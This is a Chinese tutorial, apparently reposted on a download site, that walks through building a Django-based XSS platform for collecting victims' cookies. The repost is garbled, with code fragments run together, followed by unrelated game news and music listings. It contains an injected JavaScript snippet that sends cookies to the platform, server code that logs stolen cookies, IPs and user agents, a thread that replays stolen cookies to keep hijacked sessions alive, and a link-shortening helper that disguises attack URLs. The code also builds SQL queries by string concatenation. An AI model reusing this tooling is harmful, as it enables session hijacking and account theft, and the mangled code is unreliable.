1) 简要描述
原理十分简单2333,代码呆萌,大牛勿喷 >_<
2) 基础知识
- XSS攻击基本原理和利用方法
- Django框架的使用
3) Let's start
0x01
工欲善其事必先利其器,首先我们需要准备编写代码的各种工具和环境,这里不细说。我这里的环境和工具如下:
- python 3.7.0
- pycharm
- windows 10
- mysql 8.0.15
- Django 2.1.3
需要用到的第三方库:
- django
- pymysql
- requests
0x02
我们先看一下XSS脚本是如何工作的
var website = "http://127.0.0.1"; (function() { (new Image()).src = website + '/"htmlcode">""" 根据url值动态返回相应的javascript代码 """ import pymysql,os from user.safeio import re_check def get_info(url): if not re_check(url,'num_letter'): return 'default' db = pymysql.connect('localhost','root','root','xss') cursor = db.cursor() cursor.execute("Select name From projects Where url='"+url+"'") js_name = cursor.fetchone()[0] if js_name == None: return 'default' else: return (js_name) def get_js_value(url): js_name = get_info(url) file = '\\script\\'+js_name + '.js' js_value = open(os.getcwd()+file).read() js_value = js_value.replace('<-1234->',url) return js_valueimport pymysql,time from .getscript import get_info def connect(): try: db = pymysql.connect('localhost', 'root', 'root', 'xss') cursor = db.cursor() return db,cursor except: print('连接数据库失败,正在尝试重新连接') connect() def put_letter(requests,url): now_time = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))[2:] if 'HTTP_X_FORWARDED_FOR' in requests.META: ip = requests.META['HTTP_X_FORWARDED_FOR'] else: try: ip = requests.META['REMOTE_ADDR'] except: ip = '0.0.0.0' ip = ip.replace("'","\'") origin = requests.GET.get('location','Unknown').replace("'","\'") software = requests.META.get('HTTP_USER_AGENT','Unknown').replace("'","\'") method = requests.method.replace("'","\'") data = requests.GET.get('cookie','No data').replace("'","\'") keep_alive = requests.GET.get('keepsession','0').replace("'","\'") list = [now_time,ip,origin,software,method,data,keep_alive] put_mysql(list,url) def put_mysql(list,url): db,cursor = connect() name = get_info(url) cursor.execute("Select user From projects Where url='"+url+"'") user = cursor.fetchone()[0] m_query = "INSERT INTO letters(time,name,ip,origin,software,method,data,user,keep_alive) VALUES('{0}','{1}','{2}','{3}','{4}','{5}','{6}','{7}','{8}')" m_query = m_query.format(list[0],name,list[1],list[2],list[3],list[4],list[5],user,list[6]) cursor.execute(m_query) db.commit() db.close() def get_letters(username): db, cursor = connect() m_query = "SELECT * FROM letters WHERE user = '{}'" m_query = m_query.format(username) cursor.execute(m_query) result_list = cursor.fetchall() return result_list既然我们知道了xss脚本会将信息构造通过GET的参数形式传给XSS平台,我们只需在服务器接受数据并保存即可。
0x04
我们可以为我们的平台编写新的功能以完善我们的平台,如邮件提醒,cookie活性保持等
#coding=utf-8 ''' 邮件发送 ''' import smtplib from email.mime.text import MIMEText from email.utils import formataddr my_sender='xxxx' my_pass = 'xxxx' def send_mail(user_mail): try: print(user_mail) msg=MIMEText('您点的外卖已送达,请登录平台查询','plain','utf-8') msg['From']=formataddr(["XSS平台",my_sender]) msg['To']=formataddr(["顾客",user_mail]) msg['Subject']="您点的外卖已送达,请登录平台查询" server=smtplib.SMTP_SSL("smtp.qq.com", 465) server.login(my_sender, my_pass) server.sendmail(my_sender,[user_mail,],msg.as_string()) server.quit() except Exception: pass''' 使用独立于主线程的其他线程 来保持通用项目的cookie信息'活性' 默认保持一个小时的活性 ''' import requests,queue,time,pymysql Cookie_Time = 1 def decrease(time,number): if time < number: time = '0'+str(time) else: time = str(time) return time def count_time(now_time): global Cookie_Time year = int(now_time[0:2]) month = int(now_time[3:5]) day = int(now_time[6:8]) hours = int(now_time[9:11]) if hours < Cookie_Time: if day == 1: if month == 1: month=12 year -= 1 else: day=30 month -= 1 else: day -= 1 hours += 19 else: hours -= 5 hours = decrease(hours,10) day = decrease(day,10) month = decrease(month,10) year = decrease(year,10) dec_time = ("{0}-{1}-{2} {3}").format(year,month,day,hours) + now_time[11:] return dec_time def create_queue(): Cookie_queue = queue.Queue() now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[2:] dec_time = count_time(now_time) m_query = ("SELECT software,origin,data FROM letters WHERE name='default' and time>'{}' and keep_alive = '1'").format(dec_time) db = pymysql.connect('127.0.0.1','root','root','xss') cursor = db.cursor() cursor.execute(m_query) return_list = cursor.fetchall() for x in return_list: Cookie_queue.put(x) return Cookie_queue def action(): while True: time.sleep(60) task_queue = create_queue() while not task_queue.empty(): tasks = task_queue.get() url = tasks[1] ua = tasks[0] cookie = tasks[2] headers = {'User-Agent': ua, 'Cookie': cookie} try: requests.get(url, headers=headers) except: pass注意这里需要使用独立于django主线程的子线程,比如我在manager.py里添加了这么一段代码:
import threading from xssplatform.keep_alive import action class keep_Thread(threading.Thread): def __init__(self): super(keep_Thread,self).__init__() def run(self): action() if __name__ == '__main__': th = keep_Thread() th.start()短链接:
''' 短链接生成 接口c7.gg ''' import requests,json Headers = { "accept" : "application/json, text/javascript, */*; q=0.01", "accept-encoding" : "gzip, deflate, br", "accept-language" : "zh-CN,zh;q=0.9,en;q=0.8", "content-length" : "53", "content-type" : "application/x-www-form-urlencoded; charset=UTF-8", "origin" : "https://www.985.so", "referer" : "https://www.985.so/", "user-agent" : "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", } def url_to_short(url): global Headers data = {'type':'c7','url':url} r = requests.post('https://create.ft12.com/done.php"_blank" href="https://github.com/HackerYunen/django-xss-platform">Github ,有任何问题可以提交issue,我会在第一时间进行回复。
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持。
广告合作:本站广告合作请联系QQ:858582 申请时备注:广告合作(否则不回)
免责声明:本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除!
免责声明:本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除!
暂无评论...
稳了!魔兽国服回归的3条重磅消息!官宣时间再确认!
昨天有一位朋友在大神群里分享,自己亚服账号被封号之后居然弹出了国服的封号信息对话框。
这里面让他访问的是一个国服的战网网址,com.cn和后面的zh都非常明白地表明这就是国服战网。
而他在复制这个网址并且进行登录之后,确实是网易的网址,也就是我们熟悉的停服之后国服发布的暴雪游戏产品运营到期开放退款的说明。这是一件比较奇怪的事情,因为以前都没有出现这样的情况,现在突然提示跳转到国服战网的网址,是不是说明了简体中文客户端已经开始进行更新了呢?
更新日志
2024年11月26日
2024年11月26日
- 凤飞飞《我们的主题曲》飞跃制作[正版原抓WAV+CUE]
- 刘嘉亮《亮情歌2》[WAV+CUE][1G]
- 红馆40·谭咏麟《歌者恋歌浓情30年演唱会》3CD[低速原抓WAV+CUE][1.8G]
- 刘纬武《睡眠宝宝竖琴童谣 吉卜力工作室 白噪音安抚》[320K/MP3][193.25MB]
- 【轻音乐】曼托凡尼乐团《精选辑》2CD.1998[FLAC+CUE整轨]
- 邝美云《心中有爱》1989年香港DMIJP版1MTO东芝首版[WAV+CUE]
- 群星《情叹-发烧女声DSD》天籁女声发烧碟[WAV+CUE]
- 刘纬武《睡眠宝宝竖琴童谣 吉卜力工作室 白噪音安抚》[FLAC/分轨][748.03MB]
- 理想混蛋《Origin Sessions》[320K/MP3][37.47MB]
- 公馆青少年《我其实一点都不酷》[320K/MP3][78.78MB]
- 群星《情叹-发烧男声DSD》最值得珍藏的完美男声[WAV+CUE]
- 群星《国韵飘香·贵妃醉酒HQCD黑胶王》2CD[WAV]
- 卫兰《DAUGHTER》【低速原抓WAV+CUE】
- 公馆青少年《我其实一点都不酷》[FLAC/分轨][398.22MB]
- ZWEI《迟暮的花 (Explicit)》[320K/MP3][57.16MB]